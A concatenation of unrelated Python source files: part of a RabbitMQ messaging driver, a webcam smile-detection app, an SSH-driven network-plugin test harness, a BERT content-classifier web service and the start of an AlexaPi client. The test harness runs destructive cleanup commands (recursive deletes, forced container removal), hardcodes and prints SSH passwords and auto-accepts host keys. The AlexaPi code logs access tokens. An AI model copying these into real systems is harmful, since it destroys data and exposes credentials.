def declare_direct_consumer(self, topic, callback):
"""Create a 'direct' queue.
        In nova's use, this is generally a msg_id queue used for
        responses to call/multicall.
"""
consumer = Consumer(
exchange_name='', # using default exchange
queue_name=topic,
routing_key='',
type='direct',
durable=False,
exchange_auto_delete=False,
queue_auto_delete=False,
callback=callback,
rabbit_ha_queues=self.rabbit_ha_queues,
rabbit_queue_ttl=self.rabbit_transient_queues_ttl,
enable_cancel_on_failover=self.enable_cancel_on_failover)
self.declare_consumer(consumer)
def declare_topic_consumer(self, exchange_name, topic, callback=None,
queue_name=None):
"""Create a 'topic' consumer."""
consumer = Consumer(
exchange_name=exchange_name,
queue_name=queue_name or topic,
routing_key=topic,
type='topic',
durable=self.amqp_durable_queues,
exchange_auto_delete=self.amqp_auto_delete,
queue_auto_delete=self.amqp_auto_delete,
callback=callback,
rabbit_ha_queues=self.rabbit_ha_queues,
enable_cancel_on_failover=self.enable_cancel_on_failover)
self.declare_consumer(consumer)
def declare_fanout_consumer(self, topic, callback):
"""Create a 'fanout' consumer."""
unique = uuid.uuid4().hex
exchange_name = '%s_fanout' % topic
queue_name = '%s_fanout_%s' % (topic, unique)
consumer = Consumer(
exchange_name=exchange_name,
queue_name=queue_name,
routing_key=topic,
type='fanout',
durable=False,
exchange_auto_delete=True,
queue_auto_delete=False,
callback=callback,
rabbit_ha_queues=self.rabbit_ha_queues,
rabbit_queue_ttl=self.rabbit_transient_queues_ttl,
enable_cancel_on_failover=self.enable_cancel_on_failover)
self.declare_consumer(consumer)
def _ensure_publishing(self, method, exchange, msg, routing_key=None,
timeout=None, retry=None, transport_options=None):
"""Send to a publisher based on the publisher class."""
def _error_callback(exc):
log_info = {'topic': exchange.name, 'err_str': exc}
LOG.error("Failed to publish message to topic "
"'%(topic)s': %(err_str)s", log_info)
LOG.debug('Exception', exc_info=exc)
method = functools.partial(method, exchange, msg, routing_key,
timeout, transport_options)
with self._connection_lock:
self.ensure(method, retry=retry, error_callback=_error_callback)
def _get_connection_info(self, conn_error=False):
# Bug #1745166: set 'conn_error' true if this is being called when the
# connection is in a known error state. Otherwise attempting to access
# the connection's socket while it is in an error state will cause
# py-amqp to attempt reconnecting.
ci = self.connection.info()
info = dict([(k, ci.get(k)) for k in
['hostname', 'port', 'transport']])
client_port = None
if (not conn_error and self.channel and
hasattr(self.channel.connection, 'sock') and
self.channel.connection.sock):
client_port = self.channel.connection.sock.getsockname()[1]
info.update({'client_port': client_port,
'connection_id': self.connection_id})
return info
def _publish(self, exchange, msg, routing_key=None, timeout=None,
transport_options=None):
"""Publish a message."""
if not (exchange.passive or exchange.name in self._declared_exchanges):
exchange(self.channel).declare()
self._declared_exchanges.add(exchange.name)
log_info = {'msg': msg,
'who': exchange or 'default',
'key': routing_key,
'transport_options': str(transport_options)}
LOG.trace('Connection._publish: sending message %(msg)s to'
' %(who)s with routing key %(key)s', log_info)
        # NOTE(sileht): no need to wait any longer, the caller expects
        # an answer before the timeout is reached
with self._transport_socket_timeout(timeout):
self._producer.publish(
msg,
mandatory=transport_options.at_least_once if
transport_options else False,
exchange=exchange,
routing_key=routing_key,
expiration=timeout,
compression=self.kombu_compression)
def _publish_and_creates_default_queue(self, exchange, msg,
routing_key=None, timeout=None,
transport_options=None):
"""Publisher that declares a default queue
When the exchange is missing instead of silently creates an exchange
not binded to a queue, this publisher creates a default queue
named with the routing_key
This is mainly used to not miss notification in case of nobody consumes
them yet. If the future consumer bind the default queue it can retrieve
missing messages.
_set_current_channel is responsible to cleanup the cache.
"""
queue_identifier = (exchange.name, routing_key)
        # NOTE(sileht): We only do this once per reconnection;
        # Connection._set_current_channel() is responsible for clearing
        # this cache.
if queue_identifier not in self._declared_queues:
queue = kombu.entity.Queue(
channel=self.channel,
exchange=exchange,
durable=exchange.durable,
auto_delete=exchange.auto_delete,
name=routing_key,
routing_key=routing_key,
queue_arguments=_get_queue_arguments(self.rabbit_ha_queues, 0))
log_info = {'key': routing_key, 'exchange': exchange}
LOG.trace(
'Connection._publish_and_creates_default_queue: '
'declare queue %(key)s on %(exchange)s exchange', log_info)
queue.declare()
self._declared_queues.add(queue_identifier)
self._publish(exchange, msg, routing_key=routing_key, timeout=timeout)
def _publish_and_raises_on_missing_exchange(self, exchange, msg,
routing_key=None,
timeout=None,
transport_options=None):
"""Publisher that raises exception if exchange is missing."""
if not exchange.passive:
raise RuntimeError("_publish_and_retry_on_missing_exchange() must "
"be called with an passive exchange.")
try:
self._publish(exchange, msg, routing_key=routing_key,
timeout=timeout, transport_options=transport_options)
return
except self.connection.channel_errors as exc:
if exc.code == 404:
                # NOTE(noelbk/sileht):
                # If rabbit dies, the consumer can be disconnected before the
                # publisher sends, and if the consumer hasn't declared the
                # queue, the publisher will send a message to an exchange
                # that's not bound to a queue, and the message will be lost.
                # So we set passive=True on the publisher exchange and catch
                # the 404 kombu ChannelError and retry until the exchange
                # appears.
raise rpc_amqp.AMQPDestinationNotFound(
"exchange %s doesn't exist" % exchange.name)
raise
def direct_send(self, msg_id, msg):
"""Send a 'direct' message."""
exchange = kombu.entity.Exchange(name='', # using default exchange
type='direct',
durable=False,
auto_delete=True,
passive=True)
options = oslo_messaging.TransportOptions(
at_least_once=self.direct_mandatory_flag)
self._ensure_publishing(self._publish_and_raises_on_missing_exchange,
exchange, msg, routing_key=msg_id,
transport_options=options)
def topic_send(self, exchange_name, topic, msg, timeout=None, retry=None,
transport_options=None):
"""Send a 'topic' message."""
exchange = kombu.entity.Exchange(
name=exchange_name,
type='topic',
durable=self.amqp_durable_queues,
auto_delete=self.amqp_auto_delete)
self._ensure_publishing(self._publish, exchange, msg,
routing_key=topic, timeout=timeout,
retry=retry,
transport_options=transport_options)
def fanout_send(self, topic, msg, retry=None):
"""Send a 'fanout' message."""
exchange = kombu.entity.Exchange(name='%s_fanout' % topic,
type='fanout',
durable=False,
auto_delete=True)
self._ensure_publishing(self._publish, exchange, msg, retry=retry)
def notify_send(self, exchange_name, topic, msg, retry=None, **kwargs):
"""Send a notify message on a topic."""
exchange = kombu.entity.Exchange(
name=exchange_name,
type='topic',
durable=self.amqp_durable_queues,
auto_delete=self.amqp_auto_delete)
self._ensure_publishing(self._publish_and_creates_default_queue,
exchange, msg, routing_key=topic, retry=retry)
class RabbitDriver(amqpdriver.AMQPDriverBase):
"""RabbitMQ Driver
The ``rabbit`` driver is the default driver used in OpenStack's
integration tests.
The driver is aliased as ``kombu`` to support upgrading existing
installations with older settings.
"""
def __init__(self, conf, url,
default_exchange=None,
allowed_remote_exmods=None):
opt_group = cfg.OptGroup(name='oslo_messaging_rabbit',
title='RabbitMQ driver options')
conf.register_group(opt_group)
conf.register_opts(rabbit_opts, group=opt_group)
conf.register_opts(rpc_amqp.amqp_opts, group=opt_group)
conf.register_opts(base.base_opts, group=opt_group)
conf = rpc_common.ConfigOptsProxy(conf, url, opt_group.name)
self.missing_destination_retry_timeout = (
conf.oslo_messaging_rabbit.kombu_missing_consumer_retry_timeout)
self.prefetch_size = (
conf.oslo_messaging_rabbit.rabbit_qos_prefetch_count)
# the pool configuration properties
max_size = conf.oslo_messaging_rabbit.rpc_conn_pool_size
min_size = conf.oslo_messaging_rabbit.conn_pool_min_size
if max_size < min_size:
raise RuntimeError(
f"rpc_conn_pool_size: {max_size} must be greater than "
f"or equal to conn_pool_min_size: {min_size}")
ttl = conf.oslo_messaging_rabbit.conn_pool_ttl
connection_pool = pool.ConnectionPool(
conf, max_size, min_size, ttl,
url, Connection)
super(RabbitDriver, self).__init__(
conf, url,
connection_pool,
default_exchange,
allowed_remote_exmods
)
def require_features(self, requeue=True):
pass
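# NOTE: Illustrative sketch, not part of the original driver. Applications do
# not instantiate RabbitDriver directly; they reach it through the public
# oslo.messaging API, roughly as below. The topic and server names are
# hypothetical placeholders.
def _example_rpc_client(conf):
    import oslo_messaging
    # A rabbit:// transport URL in 'conf' selects this driver.
    transport = oslo_messaging.get_rpc_transport(conf)
    target = oslo_messaging.Target(topic='example_topic', server='example_server')
    return oslo_messaging.RPCClient(transport, target)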
|
run.py
|
import cv2
import threading
import sys
from PyQt5 import QtWidgets
from PyQt5 import QtGui
from PyQt5 import QtCore
import visualize
running = False
def run():
global running
cap = cv2.VideoCapture(0)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
    label.resize(int(width), int(height))
counter=0
while running:
counter += 1
ret, img = cap.read()
if ret:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if counter % 10 == 0:
mood, emoji_img = visualize.img2mood(img)
if mood != 3:
text = 'Come on. Smile!'
loc_x = 195
loc_y = 120
else:
text = 'Your smile is beautiful!'
loc_x = 135
loc_y = 120
                emoji_img = cv2.cvtColor(emoji_img, cv2.COLOR_BGR2RGB)
cv2.putText(emoji_img, text, (loc_x, loc_y), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), thickness=2)
h,w,c = emoji_img.shape
qImg = QtGui.QImage(emoji_img.data, w, h, w*c, QtGui.QImage.Format_RGB888)
pixmap = QtGui.QPixmap.fromImage(qImg)
label.setPixmap(pixmap)
else:
QtWidgets.QMessageBox.about(win, "Error", "Cannot read frame.")
print("cannot read frame.")
break
cap.release()
print("Thread end.")
def stop():
global running
running = False
print("stoped..")
def start():
global running
running = True
th = threading.Thread(target=run)
th.start()
print("started..")
def onExit():
print("exit")
stop()
app = QtWidgets.QApplication([])
win = QtWidgets.QWidget()
vbox = QtWidgets.QVBoxLayout()
label = QtWidgets.QLabel()
btn_start = QtWidgets.QPushButton("Camera On")
btn_stop = QtWidgets.QPushButton("Camera Off")
vbox.addWidget(label)
vbox.addWidget(btn_start)
vbox.addWidget(btn_stop)
win.setLayout(vbox)
win.show()
btn_start.clicked.connect(start)
btn_stop.clicked.connect(stop)
app.aboutToQuit.connect(onExit)
sys.exit(app.exec_())
|
tnode.py
|
import paramiko
import threading
import sys
import os
import time
import container
import tutils
import exceptions
# Utility function to run ssh
def ssh_exec_thread(ssh_object, command):
print "run: " + command
stdin, stdout, stderr = ssh_object.exec_command(command)
out = stdout.readlines()
print out
print "Program exited: " + command
exitCode = stdout.channel.recv_exit_status()
if exitCode != 0:
print "Exit code: " + str(exitCode)
# This class represents a vagrant node
class Node:
def __init__(self, addr, username='vagrant', password='vagrant', binpath='/opt/gopath/bin'):
self.addr = addr
self.username = username
self.password = password
self.binpath = binpath
self.ssh = self.sshConnect(username, password)
out, err, ec = self.runCmd("hostname")
self.hostname = out[0].split('\n')[0]
print "Connected to " + self.hostname
# Connect to vagrant node
def sshConnect(self, username, password):
ssh_object = paramiko.SSHClient()
ssh_object.set_missing_host_key_policy( paramiko.AutoAddPolicy() )
print "Connecting to " + self.addr + " with userid: " + username + " password: " + password
try:
ssh_object.connect(self.addr, username=username, password=password)
return ssh_object
except paramiko.ssh_exception.AuthenticationException:
tutils.exit("Authentication failed")
def isConnected(self):
transport = self.ssh.get_transport() if self.ssh else None
return transport and transport.is_active()
# Run a command on vagrant node
def runCmd(self, cmd, timeout=None):
try:
print "run: " + cmd
            # If we were disconnected for any reason, reconnect
if not self.isConnected():
self.ssh = self.sshConnect(self.username, self.password)
# Execute the command
stdin, stdout, stderr = self.ssh.exec_command(cmd, timeout=timeout)
out = stdout.readlines()
err = stderr.readlines()
exitCode = stdout.channel.recv_exit_status()
if out != [] or exitCode != 0:
print "stdout(" + str(exitCode) + "):" + ''.join(out)
if err != []:
print "stderr: " + ''.join(err)
return out, err, exitCode
except exceptions.EOFError:
print "Ignoring EOF errors executing command"
return [], [], 0
# Start netplugin process on vagrant node
def startNetplugin(self, args=""):
ssh_object = self.sshConnect(self.username, self.password)
command = "sudo " + self.binpath + "/netplugin -plugin-mode docker -vlan-if eth2 -cluster-store " + os.environ["CONTIV_CLUSTER_STORE"] + " " + args + "> /tmp/netplugin.log 2>&1"
self.npThread = threading.Thread(target=ssh_exec_thread, args=(ssh_object, command))
# npThread.setDaemon(True)
self.npThread.start()
# Start netmaster process
def startNetmaster(self):
ssh_object = self.sshConnect(self.username, self.password)
command = "GOPATH=/opt/gopath " + self.binpath + "/netmaster -cluster-store " + os.environ["CONTIV_CLUSTER_STORE"] + " > /tmp/netmaster.log 2>&1"
self.nmThread = threading.Thread(target=ssh_exec_thread, args=(ssh_object, command))
# npThread.setDaemon(True)
self.nmThread.start()
# Start Swarm Containers
def utilSwarmContainer(self, command):
ssh_object = self.sshConnect(self.username, self.password)
self.swThread = threading.Thread(target=ssh_exec_thread, args=(ssh_object, command))
self.swThread.start()
# Stop netplugin by killing it
def stopNetplugin(self):
self.runCmd("sudo pkill netplugin")
# Stop netmaster by killing it
def stopNetmaster(self):
self.runCmd("sudo pkill netmaster")
def cleanupDockerNetwork(self):
# cleanup docker network
out, err, exitCode = self.runCmd("docker network ls | grep -w netplugin | awk '{print $2}'")
for net in out:
self.runCmd("docker network rm " + net)
# Remove all containers on this node
def cleanupContainers(self):
self.runCmd("docker ps -a | grep -v swarm | awk '{print $1}' | xargs -r docker rm -fv ")
# Cleanup all state created by netplugin
def cleanupSlave(self):
self.runCmd("docker ps -a | grep alpine | awk '{print $1}' | xargs -r docker rm -fv ")
self.runCmd("sudo ovs-vsctl del-br contivVxlanBridge")
self.runCmd("sudo ovs-vsctl del-br contivVlanBridge")
self.runCmd("ifconfig | grep -e vport | awk '{print $1}' | xargs -r -n1 -I{} sudo ip link delete {} type veth")
self.runCmd("sudo rm -f /var/run/docker/plugins/netplugin.sock")
self.runCmd("sudo rm -f /tmp/net*")
# Cleanup all state created by netmaster
def cleanupMaster(self):
self.runCmd("etcdctl ls /contiv > /dev/null 2>&1 && etcdctl rm --recursive /contiv")
self.runCmd("etcdctl ls /contiv.io > /dev/null 2>&1 && etcdctl rm --recursive /contiv.io")
self.runCmd("etcdctl ls /docker > /dev/null 2>&1 && etcdctl rm --recursive /docker")
self.runCmd("etcdctl ls /skydns > /dev/null 2>&1 && etcdctl rm --recursive /skydns")
self.runCmd("curl -X DELETE localhost:8500/v1/kv/contiv.io?recurse=true")
self.runCmd("curl -X DELETE localhost:8500/v1/kv/docker?recurse=true")
# Run container on a node
def runContainer(self, imgName="ubuntu:14.04", cmdName="sh", networkName=None, serviceName=None, cntName=""):
netSrt = ""
if networkName != None:
netSrt = "--net=" + networkName
if serviceName != None:
netSrt = "--net=" + serviceName + "." + networkName
cntStr = ""
if cntName != "":
cntStr = "--name=" + cntName
# docker command
dkrCmd = "docker run -itd " + netSrt + " " + cntStr + " " + imgName + " " + cmdName
out, err, exitCode = self.runCmd(dkrCmd)
if exitCode != 0:
print "Error running container: " + dkrCmd + " on " + self.addr
print "Exit status: " + str(exitCode) + "\nError:"
print err
exit("docker run failed")
# Container id is in the first line
cid = out[0].split('\n')[0]
# Return a container object
return container.Container(self, cid, cntName="")
def checkForNetpluginErrors(self):
out, err, exitCode = self.runCmd('grep "error\|fatal" /tmp/net*')
if out != [] or err != []:
print "\n\n\n\n\n\n"
tutils.log("Error:\n" + ''.join(out) + ''.join(err))
tutils.log("Errors seen in log files on: " + self.hostname)
return False
return True
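# Illustrative usage sketch (not part of the original file); the address and
# command below are placeholder values:
#   node = Node('192.168.2.10', username='vagrant', password='vagrant')
#   out, err, exitCode = node.runCmd('hostname')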
|
porn_prediction.py
|
import sys,os
sys.path.append("..")
import numpy as np
import tensorflow as tf
from example import bert_classifier_estimator
from bunch import Bunch
from data_generator import tokenization
from data_generator import tf_data_utils
from model_io import model_io
from example import feature_writer, write_to_tfrecords, classifier_processor
import json
os.environ["CUDA_VISIBLE_DEVICES"] = ""
def full2half(s):
n = []
for char in s:
num = ord(char)
if num == 0x3000:
num = 32
elif 0xFF01 <= num <= 0xFF5E:
num -= 0xfee0
num = chr(num)
n.append(num)
return ''.join(n)
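# Example: full2half("ABC123") == "ABC123" -- full-width ASCII characters
# (U+FF01..U+FF5E) and the ideographic space (U+3000) are mapped to their
# half-width counterparts; all other characters pass through unchanged.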
from queue import Queue
class InferAPI(object):
def __init__(self, config):
self.config = config
self.input_queue = Queue(maxsize=1)
self.output_queue = Queue(maxsize=1)
def load_label_dict(self):
with open(self.config["label2id"], "r") as frobj:
self.label_dict = json.load(frobj)
def init_model(self):
self.graph = tf.Graph()
with self.graph.as_default():
init_checkpoint = self.config["init_checkpoint"]
bert_config = json.load(open(self.config["bert_config"], "r"))
self.model_config = Bunch(bert_config)
self.model_config.use_one_hot_embeddings = True
self.model_config.scope = "bert"
self.model_config.dropout_prob = 0.1
self.model_config.label_type = "single_label"
opt_config = Bunch({"init_lr":2e-5, "num_train_steps":1e30, "cycle":False})
model_io_config = Bunch({"fix_lm":False})
self.num_classes = len(self.label_dict["id2label"])
self.max_seq_length = self.config["max_length"]
self.tokenizer = tokenization.FullTokenizer(
vocab_file=self.config["bert_vocab"],
do_lower_case=True)
self.sess = tf.Session()
self.model_io_fn = model_io.ModelIO(model_io_config)
model_fn = bert_classifier_estimator.classifier_model_fn_builder(
self.model_config,
self.num_classes,
init_checkpoint,
reuse=None,
load_pretrained=True,
model_io_fn=self.model_io_fn,
model_io_config=model_io_config,
opt_config=opt_config)
self.estimator = tf.estimator.Estimator(
model_fn=model_fn,
model_dir=self.config["model_dir"])
def get_input_features(self, sent_lst):
input_ids_lst, input_mask_lst, segment_ids_lst = [], [], []
label_ids_lst = []
for sent in sent_lst:
sent = full2half(sent)
tokens_a = self.tokenizer.tokenize(sent)
if len(tokens_a) > self.max_seq_length - 2:
tokens_a = tokens_a[0:(self.max_seq_length - 2)]
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
input_ids = self.tokenizer.convert_tokens_to_ids(tokens)
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < self.max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids = 0
input_ids_lst.append(input_ids)
input_mask_lst.append(input_mask)
segment_ids_lst.append(segment_ids)
label_ids_lst.append(label_ids)
return {"input_ids":np.array(input_ids_lst).astype(np.int32),
"input_mask":np.array(input_mask_lst).astype(np.int32),
"segment_ids":np.array(segment_ids_lst).astype(np.int32),
"label_ids":np.array(label_ids_lst).astype(np.int32)}
def input_fn(self, input_features):
dataset = tf.data.Dataset.from_tensor_slices(input_features)
dataset = dataset.batch(self.config.get("batch_size", 20))
# iterator = dataset.make_one_shot_iterator()
# features = iterator.get_next()
return dataset
def generate_from_queue(self):
""" Generator which yields items from the input queue.
This lives within our 'prediction thread'.
"""
while True:
yield self.input_queue.get()
def predict_from_queue(self):
""" Adds a prediction from the model to the output_queue.
This lives within our 'prediction thread'.
Note: estimators accept generators as inputs and return generators as output.
Here, we are iterating through the output generator, which will be
populated in lock-step with the input generator.
"""
# features = self.get_input_features(["据此,订约方同意终止认购协议,而公司及认购方概无责任根据认购协议分別发行及认购股可换股债券。"]*2)
for i in self.estimator.predict(input_fn=self.queued_predict_input_fn,
checkpoint_path=self.config["init_checkpoint"]):
# if self.verbose:
# print('Putting in output queue')
print(i)
print('Putting in output queue')
print("===========")
self.output_queue.put(i)
def queued_predict_input_fn(self):
"""
Queued version of the `predict_input_fn` in FlowerClassifier.
Instead of yielding a dataset from data as a parameter,
we construct a Dataset from a generator,
which yields from the input queue.
"""
# Fetch the inputs from the input queue
output_types = {'input_ids': tf.int32,
'input_mask': tf.int32,
'segment_ids': tf.int32,
'label_ids': tf.int32}
output_shapes = {'input_ids': [None, self.max_seq_length ],
'input_mask': [None, self.max_seq_length ],
'segment_ids': [None, self.max_seq_length ],
'label_ids': [1,]}
dataset = tf.data.Dataset.from_generator(self.generate_from_queue, output_types=output_types, output_shapes=output_shapes)
#dataset = dataset.batch(self.config.get("batch_size", 20))
return dataset
def predict(self, sent_lst):
# Get predictions dictionary
features = dict(self.get_input_features(sent_lst))
print("call api", self.input_queue.qsize())
print("call api", self.output_queue.qsize())
self.input_queue.put(features)
print("call api", self.input_queue.qsize())
predictions = self.output_queue.get() # The latest predictions generator
print("输出结果后", self.output_queue.qsize())
return predictions
def predict_single(self, sent_lst):
# Get predictions dictionary
features = dict(self.get_input_features(sent_lst))
# print("call api", self.input_queue.qsize())
# print("call api", self.output_queue.qsize())
self.input_queue.put(features)
# print("call api", self.input_queue.qsize())
predictions = self.output_queue.get() # The latest predictions generator
# print("输出结果后", self.output_queue.qsize())
predictions["label"] = self.label_dict["id2label"][str(predictions["pred_label"])]
# if predictions["label"] == 'other':
# predictions["label"] = '股票定增'
# predictions["max_prob"] = 0.0
return predictions
def predict_batch(self, sen_lst):
return [self.predict_single([sent]) for sent in sen_lst]
    def infer(self, sent_lst):
        # Build the input features for the given sentences before running prediction.
        input_features = self.get_input_features(sent_lst)
        with self.graph.as_default():
            for result in self.estimator.predict(input_fn=lambda: self.input_fn(input_features),
checkpoint_path=self.config["init_checkpoint"]):
print(result)
os.environ["CUDA_VISIBLE_DEVICES"] = ""
model_config = {
"label2id":"/data/xuht/websiteanalyze-data-seqing20180821/label_dict.json",
"init_checkpoint":"/data/xuht/websiteanalyze-data-seqing20180821/model/oqmrc_8.ckpt",
"bert_config":"/data/xuht/chinese_L-12_H-768_A-12/bert_config.json",
"max_length":128,
"bert_vocab":"/data/xuht/chinese_L-12_H-768_A-12/vocab.txt",
"model_dir":"/data/xuht/websiteanalyze-data-seqing20180821/model"
}
api = InferAPI(model_config)
api.load_label_dict()
api.init_model()
from threading import Thread
t = Thread(target=api.predict_from_queue, daemon=True)
t.start()
# while True:
# import time
# try:
# result = api.predict_batch(["据此,订约方同意终止认购协议,而公司及认购方概无责任根据认购协议分別发行及认购股可换股债券。"]*8)
# except:
# raise
# time.sleep(1)
import tornado.ioloop
import tornado.web
import tornado.httpserver
import json
class PredictHandler(tornado.web.RequestHandler):
def post(self):
body = json.loads(self.request.body.decode(), encoding="utf-8")
sentences = body.get("sentences")
result = api.predict_batch(sentences)
output = []
for row in result:
item = {}
item["label"] = str(row["label"])
item["max_prob"] = float(row["max_prob"])
output.append(item)
# result = [[[row['label']] for row in result], [[float(row['max_prob'])] for row in result]]
# print(result)
return self.write(json.dumps({"code":200, "data":output}, ensure_ascii=False))
def main():
application = tornado.web.Application([(r"/lxm",PredictHandler),])
http_server = tornado.httpserver.HTTPServer(application)
http_server.bind(8891)
http_server.start()
print("-------------server start-----------------")
tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
main()
|
main.py
|
#! /usr/bin/env python
import importlib
import os
import logging
import tempfile
import signal
import shutil
import time
import sys
import threading
import json
import optparse
import email
import subprocess
import hashlib
import yaml
import requests
import coloredlogs
import alexapi.config
import alexapi.tunein as tunein
import alexapi.capture
import alexapi.triggers as triggers
from alexapi.exceptions import ConfigurationException
from alexapi.constants import RequestType, PlayerActivity
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s')
coloredlogs.DEFAULT_FIELD_STYLES = {
'hostname': {'color': 'magenta'},
'programname': {'color': 'cyan'},
'name': {'color': 'blue'},
'levelname': {'color': 'magenta', 'bold': True},
'asctime': {'color': 'green'}
}
coloredlogs.DEFAULT_LEVEL_STYLES = {
'info': {'color': 'blue'},
'critical': {'color': 'red', 'bold': True},
'error': {'color': 'red'},
'debug': {'color': 'green'},
'warning': {'color': 'yellow'}
}
# Get arguments
parser = optparse.OptionParser()
parser.add_option('-s', '--silent',
dest="silent",
action="store_true",
default=False,
help="start without saying hello")
parser.add_option('-d', '--debug',
dest="debug",
action="store_true",
default=False,
help="display debug messages")
parser.add_option('--daemon',
dest="daemon",
action="store_true",
default=False,
help="Used by initd/systemd start script to reconfigure logging")
cmdopts, cmdargs = parser.parse_args()
silent = cmdopts.silent
debug = cmdopts.debug
config_exists = alexapi.config.filename is not None
if config_exists:
with open(alexapi.config.filename, 'r') as stream:
        config = yaml.safe_load(stream)
if debug:
log_level = logging.DEBUG
else:
if config_exists:
log_level = logging.getLevelName(config.get('logging', 'INFO').upper())
else:
log_level = logging.getLevelName('INFO')
if cmdopts.daemon:
coloredlogs.DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
else:
coloredlogs.DEFAULT_LOG_FORMAT = '%(asctime)s %(levelname)s: %(message)s'
coloredlogs.install(level=log_level)
alexa_logger = logging.getLogger('alexapi')
alexa_logger.setLevel(log_level)
logger = logging.getLogger(__name__)
if not config_exists:
logger.critical('Can not find configuration file. Exiting...')
sys.exit(1)
# Setup event commands
event_commands = {
'startup': "",
'pre_interaction': "",
'post_interaction': "",
'shutdown': "",
}
if 'event_commands' in config:
event_commands.update(config['event_commands'])
im = importlib.import_module('alexapi.device_platforms.' + config['platform']['device'] + 'platform', package=None)
cl = getattr(im, config['platform']['device'].capitalize() + 'Platform')
platform = cl(config)
class Player:
config = None
platform = None
pHandler = None
tunein_parser = None
navigation_token = None
playlist_last_item = None
progressReportRequired = []
def __init__(self, config, platform, pHandler): # pylint: disable=redefined-outer-name
self.config = config
self.platform = platform
self.pHandler = pHandler # pylint: disable=invalid-name
self.tunein_parser = tunein.TuneIn(5000)
def play_playlist(self, payload):
self.navigation_token = payload['navigationToken']
self.playlist_last_item = payload['audioItem']['streams'][-1]['streamId']
for stream in payload['audioItem']['streams']: # pylint: disable=redefined-outer-name
streamId = stream['streamId']
if stream['progressReportRequired']:
self.progressReportRequired.append(streamId)
url = stream['streamUrl']
if stream['streamUrl'].startswith("cid:"):
url = "file://" + tmp_path + hashlib.md5(
stream['streamUrl'].replace("cid:", "", 1).encode()).hexdigest() + ".mp3"
if (url.find('radiotime.com') != -1):
url = self.tunein_playlist(url)
self.pHandler.queued_play(url, stream['offsetInMilliseconds'], audio_type='media', stream_id=streamId)
def play_speech(self, mrl):
self.stop()
self.pHandler.blocking_play(mrl)
def stop(self):
self.pHandler.stop()
def is_playing(self):
return self.pHandler.is_playing()
def get_volume(self):
return self.pHandler.volume
def set_volume(self, volume):
self.pHandler.set_volume(volume)
def playback_callback(self, requestType, playerActivity, streamId):
if (requestType == RequestType.STARTED) and (playerActivity == PlayerActivity.PLAYING):
self.platform.indicate_playback()
elif (requestType in [RequestType.INTERRUPTED, RequestType.FINISHED, RequestType.ERROR]) and (
playerActivity == PlayerActivity.IDLE):
self.platform.indicate_playback(False)
if streamId:
if streamId in self.progressReportRequired:
self.progressReportRequired.remove(streamId)
gThread = threading.Thread(target=alexa_playback_progress_report_request,
args=(requestType, playerActivity, streamId))
gThread.start()
if (requestType == RequestType.FINISHED) and (playerActivity == PlayerActivity.IDLE) and (
self.playlist_last_item == streamId):
gThread = threading.Thread(target=alexa_getnextitem, args=(self.navigation_token,))
self.navigation_token = None
gThread.start()
def tunein_playlist(self, url):
logger.debug("TUNE IN URL = %s", url)
req = requests.get(url)
lines = req.content.decode().split('\n')
nurl = self.tunein_parser.parse_stream_url(lines[0])
if nurl:
return nurl[0]
return ""
# Playback handler
def playback_callback(requestType, playerActivity, streamId):
return player.playback_callback(requestType, playerActivity, streamId)
im = importlib.import_module('alexapi.playback_handlers.' + config['sound']['playback_handler'] + "handler",
package=None)
cl = getattr(im, config['sound']['playback_handler'].capitalize() + 'Handler')
pHandler = cl(config, playback_callback)
player = Player(config, platform, pHandler)
path = os.path.dirname(os.path.realpath(__file__))
resources_path = os.path.join(path, 'resources', '')
tmp_path = os.path.join(tempfile.mkdtemp(prefix='AlexaPi-runtime-'), '')
MAX_VOLUME = 100
MIN_VOLUME = 30
def internet_on():
try:
requests.get('https://api.amazon.com/auth/o2/token')
logger.info("Connection OK")
return True
except requests.exceptions.RequestException:
logger.error("Connection Failed")
return False
class Token:
_token = ''
_timestamp = None
_validity = 3570
def __init__(self, aconfig):
self._aconfig = aconfig
if not self._aconfig.get('refresh_token'):
logger.critical("AVS refresh_token not found in the configuration file. "
"Run the setup again to fix your installation (see project wiki for installation instructions).")
raise ConfigurationException
self.renew()
def __str__(self):
if (not self._timestamp) or (time.time() - self._timestamp > self._validity):
logger.debug("AVS token: Expired")
self.renew()
return self._token
def renew(self):
logger.info("AVS token: Requesting a new one")
payload = {
"client_id": self._aconfig['Client_ID'],
"client_secret": self._aconfig['Client_Secret'],
"refresh_token": self._aconfig['refresh_token'],
"grant_type": "refresh_token"
}
url = "https://api.amazon.com/auth/o2/token"
try:
response = requests.post(url, data=payload)
resp = json.loads(response.text)
logger.info(resp)
self._token = resp['access_token']
self._timestamp = time.time()
logger.info("AVS token: Obtained successfully")
except requests.exceptions.RequestException as exp:
logger.critical("AVS token: Failed to obtain a token: %s", str(exp))
# from https://github.com/respeaker/Alexa/blob/master/alexa.py
def alexa_speech_recognizer_generate_data(audio, boundary):
"""
    Generate an iterator for a chunked transfer-encoding request to the Alexa Voice Service
Args:
audio: raw 16 bit LSB audio data
boundary: boundary of multipart content
Returns:
"""
logger.debug('Start sending speech to Alexa Voice Service')
chunk = '--%s\r\n' % boundary
chunk += (
'Content-Disposition: form-data; name="request"\r\n'
'Content-Type: application/json; charset=UTF-8\r\n\r\n'
)
data = {
"messageHeader": {
"deviceContext": [{
"name": "playbackState",
"namespace": "AudioPlayer",
"payload": {
"streamId": "",
"offsetInMilliseconds": "0",
"playerActivity": "IDLE"
}
}]
},
"messageBody": {
"profile": "alexa-close-talk",
"locale": "en-us",
"format": "audio/L16; rate=16000; channels=1"
}
}
yield bytes(chunk + json.dumps(data) + '\r\n', 'utf8')
chunk = '--%s\r\n' % boundary
chunk += (
'Content-Disposition: form-data; name="audio"\r\n'
'Content-Type: audio/L16; rate=16000; channels=1\r\n\r\n'
)
yield bytes(chunk, 'utf8')
for audio_chunk in audio:
yield audio_chunk
yield bytes('--%s--\r\n' % boundary, 'utf8')
logger.debug('Finished sending speech to Alexa Voice Service')
platform.indicate_processing()
